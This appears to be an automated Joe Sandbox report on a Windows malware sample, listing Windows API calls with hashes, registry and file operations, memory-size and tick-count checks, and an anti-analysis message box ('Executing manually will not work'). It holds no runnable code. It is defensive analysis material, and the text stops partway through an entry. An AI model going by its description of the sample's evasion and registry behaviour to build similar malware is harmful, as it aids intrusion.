                                                                                                                                                                                                                                • Instruction ID: 7b038c6d047ee1bb3c9031a79a5ac0631561c8e4de89f0022c4dfcea6d19d618
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3af6d9eea52ac4946b40bf0275076d504aa9fd8a7475b892ceb9297553fbf31
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 246128386102078FC7A0EB54D4B0E8D77F6FB98308F618216ED216F759EB74AD099B61

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,015576DD,00000001,00000000,00000000,00000000), ref: 015532A9
                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,015533C5,015533C1,00000000), ref: 015532C3
                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,015576DD,00000001,00000000), ref: 015532CB
                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000003,00000003,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 015532ED
                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,015533C9,015533C1,00000000), ref: 01553304
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000003,00000003,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 015533AE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$Message$CloseCreateHandleReadSize
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2324011479-0
                                                                                                                                                                                                                                • Opcode ID: a05b98ea817b139b35555e90173f61b8a1b4fe19b5ed5b196522de2413724141
                                                                                                                                                                                                                                • Instruction ID: b8eb565ce4df937604c323363ad88246b53427df007b8af0c15c4a9ee41d4d14
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a05b98ea817b139b35555e90173f61b8a1b4fe19b5ed5b196522de2413724141
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D315A74744302AFD384EF29CC81F1AB7E5FFC8750F118929B9589B3A5DB70E8058A52

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,015567E0), ref: 015563FE
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 0155640B
                                                                                                                                                                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,00000000,GlobalMemoryStatusEx,kernel32.dll,00000000,?,015567E0), ref: 01556411
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressGlobalHandleMemoryModuleProcStatus
                                                                                                                                                                                                                                • String ID: GlobalMemoryStatusEx$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 2450578220-2840702992
                                                                                                                                                                                                                                • Opcode ID: a3a312ed9486be4f2e63f77b96369c3ca81e0c7f2df607656f50e1e524db43e0
                                                                                                                                                                                                                                • Instruction ID: 2155dda6d7c4bee4dd6e98fd11b9fb1422fe6307269cc85ec586627420ca7b0d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3a312ed9486be4f2e63f77b96369c3ca81e0c7f2df607656f50e1e524db43e0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAF062B4A04341CFDBA1DF69D4B85583BE2FB49350B920596EC24DF317E3349C049B20

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,015567E0), ref: 015563FE
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 0155640B
                                                                                                                                                                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,00000000,GlobalMemoryStatusEx,kernel32.dll,00000000,?,015567E0), ref: 01556411
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressGlobalHandleMemoryModuleProcStatus
                                                                                                                                                                                                                                • String ID: GlobalMemoryStatusEx$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 2450578220-2840702992
                                                                                                                                                                                                                                • Opcode ID: 0a939b1789be170928ebd7f134ea6910aa28aeb1e0d22a4ddbb983e6c6abcdb5
                                                                                                                                                                                                                                • Instruction ID: 92892456013030e85fdc002c76acb7b97fa33b58fef50f025f0b82c39818fa60
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a939b1789be170928ebd7f134ea6910aa28aeb1e0d22a4ddbb983e6c6abcdb5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97C09B713412727BF69031F61CD5CFE094DFC95559754057BFD14DE111D5A54D0001F1

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,01556FC4), ref: 01556F75
                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,01556FC4), ref: 01556F84
                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,01556FC4), ref: 01556FA3
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 01556FA9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3919263394-0
                                                                                                                                                                                                                                • Opcode ID: 12210f717d8a2a3f62a65dfdbfea7c0aefffa40df6956e9679f9e8e9157914d8
                                                                                                                                                                                                                                • Instruction ID: 82f66bc323cc8e796193ee97b35566ab08d997f324195edb927281db029de2d8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12210f717d8a2a3f62a65dfdbfea7c0aefffa40df6956e9679f9e8e9157914d8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7116D70A04216BFE750EF78DC92F5EB7ECFB58714FA14565B514EB1D0EA70AA008A10

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,Executing manually will not work,0155A789,00000000), ref: 0155A54A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                                • String ID: Executing manually will not work$TYQLVoFn
                                                                                                                                                                                                                                • API String ID: 2030045667-72810030
                                                                                                                                                                                                                                • Opcode ID: ad3ac2f2bb366ce6674e7825bdea143b2aca9de062735419bb20b7764221de9f
                                                                                                                                                                                                                                • Instruction ID: b5dfcbe60ddaa1d8512dffca7357823f7dab39693ed8215903bf117b258d0675
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad3ac2f2bb366ce6674e7825bdea143b2aca9de062735419bb20b7764221de9f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C71A530865349AFD7E19E61CC6DAFB3BBEFB81264B14405EFC048E141E3717A09DAA5

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00020119,?), ref: 0155693B
                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000100,?,00000000,00000000,00020119,?), ref: 01556962
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00020119,?), ref: 01556987
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                                                                                                                • Opcode ID: 712d3af2663db280e53856c2e5cbdd465a33fd0d0744bc0e4c0c6c4841cc4760
                                                                                                                                                                                                                                • Instruction ID: 17e9d00f5747afa7711ba62daa1379cbd672305205fb45b0a7a879fb61bb32ae
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 712d3af2663db280e53856c2e5cbdd465a33fd0d0744bc0e4c0c6c4841cc4760
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28115275A0021E7BCB11EAD9DC81FEEB3BCBF98354F400566FA14DB240D770AA448BA0

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                control_flow_graph 524 1556d19-1556d44 call 1541229 527 1556d87-1556d9c call 1540d9d 524->527 528 1556d46-1556d68 call 1541239 CreateFileA 524->528 528->527 533 1556d6a-1556d82 WriteFile CloseHandle 528->533 533->527
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,01556D9D), ref: 01556D5E
                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,01556D9D), ref: 01556D76
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,01556D9D), ref: 01556D82
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1065093856-0
                                                                                                                                                                                                                                • Opcode ID: 4d16d8840cc803dc2c851db0e10217e27e3826cdfe14633a8c2d00113f5d8cd9
                                                                                                                                                                                                                                • Instruction ID: e88462b89744014693f8ad5f997daeac8537de86c9a54dd30fa02d0b668fdea5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d16d8840cc803dc2c851db0e10217e27e3826cdfe14633a8c2d00113f5d8cd9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C012470A047567FE7509AA8CC92FBEB6ACFB85B14FA00675F910FB1D0D6706D004150
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,01558DD2), ref: 01558D47
                                                                                                                                                                                                                                • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,01558DD2), ref: 01558D7B
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateOpen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 436179556-0
                                                                                                                                                                                                                                • Opcode ID: 6057284e5bbcf6a4c3365dbc32df66d0809416339f3c86c0c541e20346297c06
                                                                                                                                                                                                                                • Instruction ID: 11e1652ffa43ce3cd6db81920f60f0674de64dba709383d034a6770654b8ced0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6057284e5bbcf6a4c3365dbc32df66d0809416339f3c86c0c541e20346297c06
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F631C470A0420ABFDB51DBA6CC50BDEB7FCBF54304F5484B6E911EB280D775AA088740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,01556FC4), ref: 01556FA3
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 01556FA9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseFileHandleRead
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2331702139-0
                                                                                                                                                                                                                                • Opcode ID: 0b32f6d4fc82639a93192d05476157a2f092e9cfee2ccd6f6b37f76794bbbfd4
                                                                                                                                                                                                                                • Instruction ID: a0a14e71b2d1d6de013e2177f6ff50d27525d7d9b8ccaeee4088f1ad84ab36d7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b32f6d4fc82639a93192d05476157a2f092e9cfee2ccd6f6b37f76794bbbfd4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EFE04F75908106BFE744EBA4DC91EADB3FCFF98300FE04466B455DB144DA30A9048B20
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,?,01559095,00000000,015591FC,?,?,00000000,00000000), ref: 015568CD
                                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,?,?,01559095,00000000,015591FC,?,?,00000000,00000000), ref: 015568EA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                • Opcode ID: 150071e8d115d48b6e860e46511f068db359f69ce08f9d5d34f1670f96483210
                                                                                                                                                                                                                                • Instruction ID: 89fd308bdb5d05edce58c2cebc6fee462c991318497c1a7138e02d8b61206e0f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 150071e8d115d48b6e860e46511f068db359f69ce08f9d5d34f1670f96483210
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1D0A9E0B00A331BCBA031BC0CD9B4E00CC3BA9278B500302FA28DF2D1DA78CC9202A0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,0155A28D,00000000,0155A2A8,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01559F2F
                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,0155A28D,00000000,0155A2A8,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01559F35
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CurrentTerminate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2429186680-0
                                                                                                                                                                                                                                • Opcode ID: b11399cddf9350ece28e91c1209740a3cf97649afd2b7b8c8d81269606c38880
                                                                                                                                                                                                                                • Instruction ID: b964ec3b88afc478fd0aaeb80557f07df5d9e8f5f914bb390619e79cb2b602c4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b11399cddf9350ece28e91c1209740a3cf97649afd2b7b8c8d81269606c38880
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA90026954C22312D8D032B01C4DB0918383BE1A49FC115C051085D4E0F87990004421
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,0153E760), ref: 0153E3FC
                                                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,0153E760), ref: 0153E423
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2087232378-0
                                                                                                                                                                                                                                • Opcode ID: e4486c620871cc4d06bb44b0b308f8b8550578f222fcde89f9a124b91a91108f
                                                                                                                                                                                                                                • Instruction ID: cd927669242ca67cf115fef2539ee1d1451137c6496af9e5fc9f50f8e0d5ab45
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4486c620871cc4d06bb44b0b308f8b8550578f222fcde89f9a124b91a91108f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18F02773F0022256EB21596C4CC2B965BC5FFC9B90F044070FA0CEF3C9C6A15C0142A0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CountTick
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 536389180-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 01558E4E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 01558E4E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadStringA.USER32(00000000,00010000,?,00001000), ref: 01542BE3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LoadString
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2948472770-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00840000,?,00000105), ref: 0154206F
                                                                                                                                                                                                                                  • Part of subcall function 015422E5: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 01542300
                                                                                                                                                                                                                                  • Part of subcall function 015422E5: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0154231E
                                                                                                                                                                                                                                  • Part of subcall function 015422E5: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0154233C
                                                                                                                                                                                                                                  • Part of subcall function 015422E5: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 0154235A
                                                                                                                                                                                                                                  • Part of subcall function 015422E5: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,015423E9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 015423A3
                                                                                                                                                                                                                                  • Part of subcall function 015422E5: RegQueryValueExA.ADVAPI32(?,01542565,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,015423E9,?,80000001), ref: 015423C1
                                                                                                                                                                                                                                  • Part of subcall function 015422E5: RegCloseKey.ADVAPI32(?,015423F0,00000000,00000000,00000005,00000000,015423E9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 015423E3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2796650324-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,01556457,00000000,01558867,01558A0D,?,c:\,01558A0D,?,c:\), ref: 01544860
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,01556462,00000000,01558867,01558A0D,?,c:\,01558A0D,?,c:\), ref: 01544B7A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4241100979-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 74906ca78a5ed234824da2d21b4ef579ad23ae74e18219abc59e4195ec916c3d
                                                                                                                                                                                                                                • Instruction ID: be68be7296445d1d8c9efe5ed17a0ddc0ed5e3a0c0ce8a40cfea562a1559ef80
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74906ca78a5ed234824da2d21b4ef579ad23ae74e18219abc59e4195ec916c3d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24A00231445A80DBDE11DB10CB49B09B761FBC0F01F108E64A0464781457785800D941
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 0153E60A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                • Opcode ID: a1bed0b937c79b8bd1586af4ee93c46360e663a9ff0cc2330cbf83af221c867d
                                                                                                                                                                                                                                • Instruction ID: d067ca390922957eaed3df9b2f74f5468453717fda7b9b7be5dad56f59386a8e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1bed0b937c79b8bd1586af4ee93c46360e663a9ff0cc2330cbf83af221c867d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E121CCB4605346DFCB51CF2CD881A5ABBE4FF88350F148929F999DB344E330E9548B52
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0153E522
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                                                                                                                • Opcode ID: 799746e9b1a01add70bf1d4f0f5c1e09c2d6d298bae5fb1f1628dfbcd4265edf
                                                                                                                                                                                                                                • Instruction ID: 265904b305641a2623b44846ab437359a02c336f58a3a3771436e2593d781c3a
